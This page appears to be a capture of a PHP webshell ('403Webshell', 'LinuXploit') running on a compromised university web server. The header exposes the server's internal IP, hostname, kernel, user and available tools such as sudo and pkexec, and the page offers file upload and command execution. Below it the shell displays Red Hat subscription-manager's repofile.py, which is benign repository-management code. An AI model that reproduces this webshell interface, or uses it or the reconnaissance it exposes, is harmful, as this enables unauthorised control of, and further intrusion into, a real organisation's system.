403Webshell
Server IP : 172.24.0.40  /  Your IP : 216.73.216.10
Web Server : Apache
System : Linux dbweb26.ust.edu.ph 4.18.0-513.5.1.el8_9.x86_64 #1 SMP Fri Sep 29 05:21:10 EDT 2023 x86_64
User : apache ( 48)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib64/python3.6/site-packages/subscription_manager/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib64/python3.6/site-packages/subscription_manager/repofile.py
#
# -*- coding: utf-8 -*-#
from __future__ import print_function, division, absolute_import

# Copyright (c) 2010 Red Hat, Inc.
# Copyright (c) 2017 ATIX AG
#
# Authors: Jeff Ortel <jortel@redhat.com>
#          Matthias Dellweg <dellweg@atix.de>
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#

from iniparse import RawConfigParser as ConfigParser
import logging
import os
import re
import string
import sys

try:
    from debian.deb822 import Deb822
    HAS_DEB822 = True
except ImportError as e:
    HAS_DEB822 = False

from subscription_manager import utils
from subscription_manager.certdirectory import Path
from six.moves import configparser
from six.moves.urllib.parse import parse_qs, urlparse, urlunparse, urlencode

from rhsm.config import get_config_parser

from rhsmlib.services import config

log = logging.getLogger(__name__)

conf = config.Config(get_config_parser())

repo_files = []

# detect if running with yum, otherwise it's dnf
HAS_YUM = "yum" in sys.modules


class Repo(dict):
    # (name, mutable, default) - The mutability information is only used in disconnected cases
    PROPERTIES = {
            'name': (0, None),
            'baseurl': (0, None),
            'enabled': (1, '1'),
            'gpgcheck': (1, '1'),
            'gpgkey': (0, None),
            'sslverify': (1, '1'),
            'sslcacert': (0, None),
            'sslclientkey': (0, None),
            'sslclientcert': (0, None),
            "sslverifystatus": (1, None),
            'metadata_expire': (1, None),
            'enabled_metadata': (1, '0'),
            'proxy': (0, None),
            'proxy_username': (0, None),
            'proxy_password': (0, None),
            'ui_repoid_vars': (0, None)}

    def __init__(self, repo_id, existing_values=None):
        # existing_values is a list of 2-tuples
        existing_values = existing_values or []
        self.id = self._clean_id(repo_id)

        # used to store key order, so we can write things out in the order
        # we read them from the config.
        self._order = []

        self.content_type = None

        for key, value in existing_values:
            # only set keys that have a non-empty value, to not clutter the
            # file.
            if value:
                self[key] = value

        # NOTE: This sets the above properties to the default values even if
        # they are not defined on disk. i.e. these properties will always
        # appear in this dict, but their values may be None.
        for k, (_m, d) in list(self.PROPERTIES.items()):
            if k not in list(self.keys()):
                self[k] = d

    def copy(self):
        new_repo = Repo(self.id)
        for key, value in list(self.items()):
            new_repo[key] = value
        return new_repo

    @classmethod
    def from_ent_cert_content(cls, content, baseurl, ca_cert, release_source):
        """Create an instance of Repo() from an ent_cert.EntitlementCertContent().

        And the other out of band info we need including baseurl, ca_cert, and
        the release version string.
        """
        repo = cls(content.label)

        repo.content_type = content.content_type

        repo['name'] = content.name

        if content.enabled:
            repo['enabled'] = "1"
            repo['enabled_metadata'] = "1"
        else:
            repo['enabled'] = "0"
            repo['enabled_metadata'] = "0"

        expanded_url_path = Repo._expand_releasever(release_source, content.url)
        repo['baseurl'] = utils.url_base_join(baseurl, expanded_url_path)

        # Extract the variables from the url
        repo_parts = repo['baseurl'].split("/")
        repoid_vars = [part[1:] for part in repo_parts if part.startswith("$")]
        if HAS_YUM and repoid_vars:
            repo['ui_repoid_vars'] = " ".join(repoid_vars)

        # If no GPG key URL is specified, turn gpgcheck off:
        gpg_url = content.gpg
        if not gpg_url:
            gpg_url = ''
            repo['gpgcheck'] = '0'
        else:
            gpg_url = utils.url_base_join(baseurl, gpg_url)
            # Leave gpgcheck as the default of 1
        repomd_gpg_url = conf['rhsm']['repomd_gpg_url']
        if repomd_gpg_url:
            repomd_gpg_url = utils.url_base_join(baseurl, repomd_gpg_url)
            if not gpg_url or gpg_url in ['https://', 'http://']:
                gpg_url = repomd_gpg_url
            elif repomd_gpg_url not in gpg_url:
                gpg_url += ',' + repomd_gpg_url
        repo['gpgkey'] = gpg_url

        repo['sslclientkey'] = content.cert.key_path()
        repo['sslclientcert'] = content.cert.path
        repo['sslcacert'] = ca_cert
        repo['metadata_expire'] = content.metadata_expire

        repo = Repo._set_proxy_info(repo)

        return repo

    @staticmethod
    def _set_proxy_info(repo):
        proxy = ""

        proxy_scheme = conf['server']['proxy_scheme']

        if proxy_scheme.endswith("://"):
            proxy_scheme = proxy_scheme[:-3]

        # Proxy scheme can be empty: 1704662
        if proxy_scheme == "":
            defaults = conf.defaults()
            proxy_scheme = defaults.get('proxy_scheme', 'http')

        # Worth passing in proxy config info to from_ent_cert_content()?
        # That would decouple Repo some
        proxy_host = conf['server']['proxy_hostname']

        # proxy_port as string is fine here
        proxy_port = conf['server']['proxy_port']

        if proxy_host != "":
            if proxy_port:
                proxy_host = proxy_host + ":" + proxy_port
            proxy = proxy_scheme + "://" + proxy_host

        # These could be empty string, in which case they will not be
        # set in the yum repo file:
        repo['proxy'] = proxy
        repo['proxy_username'] = conf['server']['proxy_user']
        repo['proxy_password'] = conf['server']['proxy_password']

        return repo

    @staticmethod
    def _expand_releasever(release_source, contenturl):
        # no $releasever to expand
        if release_source.marker not in contenturl:
            return contenturl

        expansion = release_source.get_expansion()

        # NOTE: This is building a url from external info
        #       so likely needs more validation. In our case, the
        #       external source is trusted (release list from tls
        #       mutually authed cdn, or a tls mutual auth api)
        # NOTE: The on disk cache is more vulnerable, since it is
        #       trusted.
        return contenturl.replace(release_source.marker,
                                  expansion)

    def _clean_id(self, repo_id):
        """
        Format the config file id to contain only characters that yum expects
        (we'll just replace 'bad' chars with -)
        """
        new_id = ""
        valid_chars = string.ascii_letters + string.digits + "-_.:"
        for byte in repo_id:
            if byte not in valid_chars:
                new_id += '-'
            else:
                new_id += byte

        return new_id

    def items(self):
        """
        Called when we fetch the items for this yum repo to write to disk.
        """
        # Skip anything set to 'None' or empty string, as this is likely
        # not intended for a yum repo file. None can result here if the
        # default is None, or the entitlement certificate did not have the
        # value set.
        #
        # all values will be in _order, since the key has to have been set
        # to get into our dict.
        return tuple([(k, self[k]) for k in self._order if
                     k in self and self[k]])

    def __setitem__(self, key, value):
        if key not in self._order:
            self._order.append(key)
        dict.__setitem__(self, key, value)

    def __str__(self):
        s = []
        s.append('[%s]' % self.id)
        for k in self.PROPERTIES:
            v = self.get(k)
            if v is None:
                continue
            s.append('%s=%s' % (k, v))

        return '\n'.join(s)

    def __eq__(self, other):
        return (self.id == other.id)

    def __hash__(self):
        return hash(self.id)


def manage_repos_enabled():

    try:
        manage_repos = conf['rhsm'].get_int('manage_repos')
    except ValueError as e:
        log.exception(e)
        return True
    except configparser.Error as e:
        log.exception(e)
        return True
    else:
        if manage_repos is None:
            return True

    return bool(manage_repos)


class TidyWriter(object):

    """
    ini file reader that removes successive newlines,
    and adds a trailing newline to the end of a file.

    used to keep our repo file clean after removals and additions of
    new sections, as iniparser's tidy function is not available in all
    versions.
    """

    def __init__(self, backing_file):
        self.backing_file = backing_file
        self.ends_with_newline = False
        self.writing_empty_lines = False

    def write(self, line):
        lines = line.split("\n")
        i = 0
        while i < len(lines):
            line = lines[i]
            if line == "":
                if i != len(lines) - 1:
                    if not self.writing_empty_lines:
                        self.backing_file.write("\n")
                    self.writing_empty_lines = True
            else:
                self.writing_empty_lines = False
                self.backing_file.write(line)
                if i != len(lines) - 1:
                    self.backing_file.write("\n")

            i += 1

        if lines[-1] == "":
            self.ends_with_newline = True
        else:
            self.ends_with_newline = False

    def close(self):
        if not self.ends_with_newline:
            self.backing_file.write("\n")


class RepoFileBase(object):
    """
    Base class for managing repository.
    """

    PATH = None
    NAME = None
    REPOFILE_HEADER = None

    def __init__(self, path=None, name=None):
        # note PATH get's expanded with chroot info, etc
        path = path or self.PATH
        name = name or self.NAME
        self.path = Path.join(path, name)
        self.repos_dir = Path.abs(path)
        self.manage_repos = manage_repos_enabled()
        if self.manage_repos is True:
            self.create()

    # Easier than trying to mock/patch os.path.exists
    def path_exists(self, path):
        """
        Wrapper around os.path.exists
        """
        return os.path.exists(path)

    def exists(self):
        return self.path_exists(self.path)

    def create_dir_path(self):
        """
        Try to create directory for .repo files
        :return: None
        """
        if not self.path_exists(self.repos_dir):
            log.debug('The directory %s does not exist. Trying to create it' % self.PATH)
            try:
                os.makedirs(name=self.repos_dir, mode=0o755)
            except Exception as err:
                log.warning('Unable to create directory: %s, error: %s' % (self.repos_dir, err))
        else:
            log.debug('The directory %s already exists' % self.repos_dir)

    def create(self):
        """
        Try to create new repo file.
        :return: None
        """
        self.create_dir_path()
        if self.path_exists(self.path) or not self.manage_repos:
            return
        with open(self.path, 'w') as f:
            f.write(self.REPOFILE_HEADER)

    def fix_content(self, content):
        return content

    @classmethod
    def installed(cls):
        return os.path.exists(Path.abs(cls.PATH))

    @classmethod
    def server_value_repo_file(cls):
        return cls('var/lib/rhsm/repo_server_val/')


if HAS_DEB822:
    class AptRepoFile(RepoFileBase):

        PATH = 'etc/apt/sources.list.d'
        NAME = 'rhsm.sources'
        CONTENT_TYPES = ['deb']
        REPOFILE_HEADER = """#
# Certificate-Based Repositories
# Managed by (rhsm) subscription-manager
#
# *** This file is auto-generated.  Changes made here will be over-written. ***
# *** Use "subscription-manager repo-override --help" if you wish to make changes. ***
#
# If this file is empty and this system is subscribed consider
# a "apt-get update" to refresh available repos
#
# *** DO NOT EDIT THIS FILE ***
#
"""

        def __init__(self, path=None, name=None):
            super(AptRepoFile, self).__init__(path, name)
            self.repos822 = []

        def read(self):
            if not self.manage_repos:
                log.debug("Skipping read due to manage_repos setting: %s" %
                        self.path)
                return
            with open(self.path, 'r') as f:
                for repo822 in Deb822.iter_paragraphs(f, shared_storage=False):
                    self.repos822.append(repo822)

        def write(self):
            if not self.manage_repos:
                log.debug("Skipping write due to manage_repos setting: %s" %
                        self.path)
                return
            with open(self.path, 'w') as f:
                f.write(self.REPOFILE_HEADER)
                for repo822 in self.repos822:
                    f.write('\n')
                    repo822.dump(f, text_mode=True)

        def add(self, repo):
            repo_dict = dict([(str(k), str(v)) for (k, v) in repo.items()])
            repo_dict['id'] = repo.id
            self.repos822.append(Deb822(repo_dict))

        def delete(self, repo):
            self.repos822[:] = [repo822 for repo822 in self.repos822 if repo822['id'] != repo.id]

        def update(self, repo):
            repo_dict = dict([(str(k), str(v)) for (k, v) in repo.items()])
            repo_dict['id'] = repo.id
            self.repos822[:] = [repo822 if repo822['id'] != repo.id else Deb822(repo_dict) for repo822 in self.repos822]

        def section(self, repo_id):
            result = [repo822 for repo822 in self.repos822 if repo822['id'] == repo_id]
            if len(result) > 0:
                return Repo(result[0]['id'], result[0].items())
            else:
                return None

        def sections(self):
            return [Repo(repo822) for repo822 in self.repos822]

        def fix_content(self, content):
            # Luckily apt ignores all Fields it does not recognize
            baseurl = content['baseurl']
            url_res = re.match(r"^https?://(?P<location>.*)$", baseurl)
            ent_res = re.match(r"^/etc/pki/entitlement/(?P<entitlement>.*).pem$", content['sslclientcert'])
            if url_res and ent_res:
                location = url_res.group('location')
                entitlement = ent_res.group('entitlement')
                baseurl = 'katello://{}@{}'.format(entitlement, location)

            apt_cont = content.copy()
            apt_cont['Types'] = 'deb'
            apt_cont['URIs'] = baseurl
            apt_cont['Suites'] = 'default'
            apt_cont['Components'] = 'all'
            apt_cont['Trusted'] = 'yes'
            return apt_cont


class YumRepoFile(RepoFileBase, ConfigParser):

    PATH = 'etc/yum.repos.d/'
    NAME = 'redhat.repo'
    CONTENT_TYPES = ['yum']
    REPOFILE_HEADER = """#
# Certificate-Based Repositories
# Managed by (rhsm) subscription-manager
#
# *** This file is auto-generated.  Changes made here will be over-written. ***
# *** Use "subscription-manager repo-override --help" if you wish to make changes. ***
#
# If this file is empty and this system is subscribed consider
# a "yum repolist" to refresh available repos
#
"""

    def __init__(self, path=None, name=None):
        ConfigParser.__init__(self)
        RepoFileBase.__init__(self, path, name)

    def read(self):
        ConfigParser.read(self, self.path)

    def _configparsers_equal(self, otherparser):
        if set(otherparser.sections()) != set(self.sections()):
            return False

        for section in self.sections():
            # Sometimes we end up with ints, but values must be strings to compare
            current_items = dict([(str(k), str(v)) for (k, v) in self.items(section)])
            if current_items != dict(otherparser.items(section)):
                return False
        return True

    def _has_changed(self):
        """
        Check if the version on disk is different from what we have loaded
        """
        on_disk = ConfigParser()
        on_disk.read(self.path)
        return not self._configparsers_equal(on_disk)

    def write(self):
        if not self.manage_repos:
            log.debug("Skipping write due to manage_repos setting: %s" %
                    self.path)
            return
        if self._has_changed():
            with open(self.path, 'w') as f:
                tidy_writer = TidyWriter(f)
                ConfigParser.write(self, tidy_writer)
                tidy_writer.close()

    def add(self, repo):
        self.add_section(repo.id)
        self.update(repo)

    def delete(self, section):
        return self.remove_section(section)

    def update(self, repo):
        # Need to clear out the old section to allow unsetting options:
        # don't use remove section though, as that will reorder sections,
        # and move whitespace around (resulting in more and more whitespace
        # as time progresses).
        for (k, v) in self.items(repo.id):
            self.remove_option(repo.id, k)

        for k, v in list(repo.items()):
            ConfigParser.set(self, repo.id, k, v)

    def section(self, section):
        if self.has_section(section):
            return Repo(section, self.items(section))


class ZypperRepoFile(YumRepoFile):
    """
    Class for manipulation of repo file on systems using Zypper (SuSE, OpenSuse).
    """

    ZYPP_RHSM_PLUGIN_CONFIG_FILE = '/etc/rhsm/zypper.conf'
    PATH = 'etc/rhsm/zypper.repos.d'
    NAME = 'redhat.repo'
    REPOFILE_HEADER = """#
# Certificate-Based Repositories
# Managed by (rhsm) subscription-manager
#
# *** This file is auto-generated.  Changes made here will be over-written. ***
# *** Use "subscription-manager repo-override --help" if you wish to make changes. ***
#
# If this file is empty and this system is subscribed consider
# a "zypper lr" to refresh available repos
#
"""

    def __init__(self, path=None, name=None):
        super(ZypperRepoFile, self).__init__(path, name)
        self.gpgcheck = False
        self.repo_gpgcheck = False
        self.autorefresh = False

    def read_zypp_conf(self):
        """
        Read configuration file for zypper plugin
        :return: None
        """
        zypp_cfg = configparser.ConfigParser()
        zypp_cfg.read(self.ZYPP_RHSM_PLUGIN_CONFIG_FILE)
        if zypp_cfg.has_option('rhsm-plugin', 'gpgcheck'):
            self.gpgcheck = zypp_cfg.getboolean('rhsm-plugin', 'gpgcheck')
        if zypp_cfg.has_option('rhsm-plugin', 'repo_gpgcheck'):
            self.repo_gpgcheck = zypp_cfg.getboolean('rhsm-plugin', 'repo_gpgcheck')
        if zypp_cfg.has_option('rhsm-plugin', 'autorefresh'):
            self.autorefresh = zypp_cfg.getboolean('rhsm-plugin', 'autorefresh')

    def fix_content(self, content):
        self.read_zypp_conf()
        zypper_cont = content.copy()
        sslverify = zypper_cont['sslverify']
        sslcacert = zypper_cont['sslcacert']
        sslclientkey = zypper_cont['sslclientkey']
        sslclientcert = zypper_cont['sslclientcert']
        proxy = zypper_cont['proxy']
        proxy_username = zypper_cont['proxy_username']
        proxy_password = zypper_cont['proxy_password']

        del zypper_cont['sslverify']
        del zypper_cont['sslcacert']
        del zypper_cont['sslclientkey']
        del zypper_cont['sslclientcert']
        del zypper_cont['proxy']
        del zypper_cont['proxy_username']
        del zypper_cont['proxy_password']
        # NOTE looks like metadata_expire and ui_repoid_vars are ignored by zypper

        # clean up data for zypper
        if zypper_cont['gpgkey'] in ['https://', 'http://']:
            del zypper_cont['gpgkey']

        # See BZ: https://bugzilla.redhat.com/show_bug.cgi?id=1764265
        if self.gpgcheck is False:
            zypper_cont['gpgcheck'] = '0'

        # See BZ: https://bugzilla.redhat.com/show_bug.cgi?id=1858231
        if self.repo_gpgcheck is True:
            zypper_cont['repo_gpgcheck'] = '1'
        else:
            zypper_cont['repo_gpgcheck'] = '0'

        # See BZ: https://bugzilla.redhat.com/show_bug.cgi?id=1797386
        if self.autorefresh is True:
            zypper_cont['autorefresh'] = '1'
        else:
            zypper_cont['autorefresh'] = '0'

        baseurl = zypper_cont['baseurl']
        parsed = urlparse(baseurl)
        zypper_query_args = parse_qs(parsed.query)
        if sslverify and sslverify in ['1']:
            zypper_query_args['ssl_verify'] = 'host'
        if sslcacert:
            zypper_query_args['ssl_capath'] = os.path.dirname(sslcacert)
        if sslclientkey:
            zypper_query_args['ssl_clientkey'] = sslclientkey
        if sslclientcert:
            zypper_query_args['ssl_clientcert'] = sslclientcert
        if proxy:
            zypper_query_args['proxy'] = proxy
        if proxy_username:
            zypper_query_args['proxyuser'] = proxy_username
        if proxy_password:
            zypper_query_args['proxypass'] = proxy_password
        zypper_query = urlencode(zypper_query_args)

        new_url = urlunparse((parsed.scheme, parsed.netloc, parsed.path, parsed.params, zypper_query, parsed.fragment))
        zypper_cont['baseurl'] = new_url

        return zypper_cont

    # We need to overwrite this, to avoid name clashes with yum's server_val_repo_file
    @classmethod
    def server_value_repo_file(cls):
        return cls('var/lib/rhsm/repo_server_val/', 'zypper_{}'.format(cls.NAME))


def init_repo_file_classes():
    repo_file_classes = [YumRepoFile, ZypperRepoFile]
    if HAS_DEB822:
        repo_file_classes.append(AptRepoFile)
    _repo_files = [
        (RepoFile, RepoFile.server_value_repo_file)
        for RepoFile in repo_file_classes
        if RepoFile.installed()
    ]
    return _repo_files


def get_repo_file_classes():
    global repo_files
    if not repo_files:
        repo_files = init_repo_file_classes()
    return repo_files

Youez - 2016 - github.com/yon3zu
LinuXploit